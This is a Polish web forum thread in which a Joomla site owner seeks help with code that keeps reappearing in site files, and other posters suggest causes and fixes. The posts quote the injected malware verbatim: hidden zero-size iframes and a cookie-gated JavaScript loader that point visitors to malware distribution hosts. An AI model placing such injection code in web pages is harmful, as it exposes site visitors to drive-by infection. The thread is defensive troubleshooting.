Problem z wirusem -> iframe src=http://s1.kaluchka1.in/

[krzychoooo]

Witam
Co kilka dni do plików php html js dokleja mi się taki kod:

Kod:

<!--qpi--><iframe src=http://s1.kaluchka1.in/gate.php?f=955068   frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi-->

Jak coś chce zmienić na stronie to :
- kasuje całą stronę i bazę danych.
- przywracam stronę z kopi która w żadnym pliku nie ma takiego kodu .
- dokonuje zmiany.
- robię kopie (Akeea backup)

Od jakiegoś czasu nie moge dojść skąd to się bierze.
Joomla 1.7.3
Ustawienia php według zaleceń, .htaccess funkcjonuje.

Czy miał ktoś podobny problem?

[nikszal]

Od jakiegoś czasu nie moge dojść skąd to się bierze.

Strzelę w ciemno - zainstalowałeś jakieś rozszerzenie pochodzące z niepewnego źródła, nie daj Boże z jakiegoś wareza na przykład?

Zmień hasła (zaplecze, serwer FTP), ściągnij witrynę na serwer lokalny i szukaj źródła problemu.

[robak142]

Prawdopodobnie wykradziono Ci hasła do ftp. Po pierwsze zmień hasła ftp, po drugie nie wpisuj ich na stałe np w TC, po trzecie dogłębnie przeskanuj komputer.

[krzychoooo]

Dodatki komponenty itd pobierałem z http://extensions.joomla.org/.
Szablon zakupiony w firmie SmartAddons.Com.
Zainstalowany dodatek "spadaj".
Hasło do ftp już zmieniałem.
Komputer przeskanowany avast'em.
Hasło nie zapisane na twardym. Hmm tylko jeśli coś mi nasłuc***e na porcie 21 to i tak przechwyci hasło.
Czy da się w XP jakoś założyć loga co się dzieje na porcie 21?
W plikach js jet oczywiście trochę inny wpis:

Kod:

/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
	window.setTimeout(function(){
		var JSinj=document.createElement('iframe');
		JSinj.src='http://s1.kaluchka1.in/gate.php?f=955068&r='+escape(document.referrer||'');
		JSinj.width='0';
		JSinj.height='0';
		JSinj.frameborder='0';
		JSinj.marginheight='0';
		JSinj.marginwidth='0';
		JSinj.border='0';
		try{
			document.body.appendChild(JSinj);
		}catch(e){
			document.documentElement.appendChild(JSinj);
		}
	}, 2000);
}
/*qpi*/

[nikszal]

Komputer przeskanowany avast'em.

Proponuję coś lepszego zainstalować. Kaspersky Internet Security nie jest drogi.

[krzychoooo]

W plikach szablonu znalazłem taki kod:

Kod:

<!--qpi--><iframe src=http://googlecounter.in/gate.php?f=861280   frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi--><!--qpi--><!--/qpi--><!--qpi--><!--qpi-->

na stronie googli do diagnozowania witryn
http://google.com/safebrowsing/diagn...nter.in/&hl=pl
Jest taki wpis:

Kod:

Bezpieczne przeglądanie
Strona diagnostyczna witryny googlecounter.in

Jaki jest obecny stan bezpieczeństwa witryny googlecounter.in?

    Ta witryna nie jest obecnie uznawana za podejrzaną.

Co się stało podczas odwiedzin tej witryny przez Google?

    W ciągu ostatnich 90 dni przetestowaliśmy w tej witrynie następującą liczbę stron: 880. Wyświetlanie 0 z nich spowodowało pobranie i zainstalowanie złośliwego oprogramowania bez zgody użytkownika. Witryna ta po raz ostatni była odwiedzana przez Google 2012-01-11, a po raz ostatni znaleziono w niej podejrzane treści 2012-01-11.

    Złośliwe oprogramowanie obejmuje 423 trojan(s), 72 exploit(s), 69 scripting exploit(s).

    Ta witryna działała w następującej liczbie sieci: 2, m.in. AS35017 (SWIFTWAY), AS24971 (MASTER).

Czy ta witryna pośredniczyła w rozpowszechnianiu złośliwego oprogramowania?

    Wydaje się, że w ciągu ostatnich 90 dni witryna googlecounter.in pośredniczyła w zarażeniu następującej liczby witryn: 125, m.in. haberunye.com/, euromarkt.pl/, lospeques.com/.

Co to jest ten googlecounter ?

[mjmartino]

Jak masz jakieś podejrzenia co do obcego iframe co jest zresztą dziwne w szablonie to go usuń i poczekaj na efekty.

zwrócona zawartość iframe

Kod:

The requested URL /out.php?p=mhaBxKqEnAXIVTaOhY2k43ObuL3W2SoC0oi6MHkUwsOOmiF0ZgONSaEMHm2qXTmHFDxGZbvJNUJg43GRLptlNkBhD+jA08CshZKWHhmTzAL3FzsNDDNwPHa1Fngdwg==&nc=false&nj=false&ic=false&ds=false&iu=false&wc=false&sw=1680&sh=1050&sd=32&np=false&pm=Win32&is_iframe=false& was not found on this server.

Czy to coś zbiera informacje a przynajmniej uzyskuje rozdzielczość głębie oraz system : )

Poza tym domena .in wskazuje na INDIE czyli kraj wysokiego ryzyka rozsyłania różnych rzeczy.. wiec .httaccess i deny dla owej domeny; )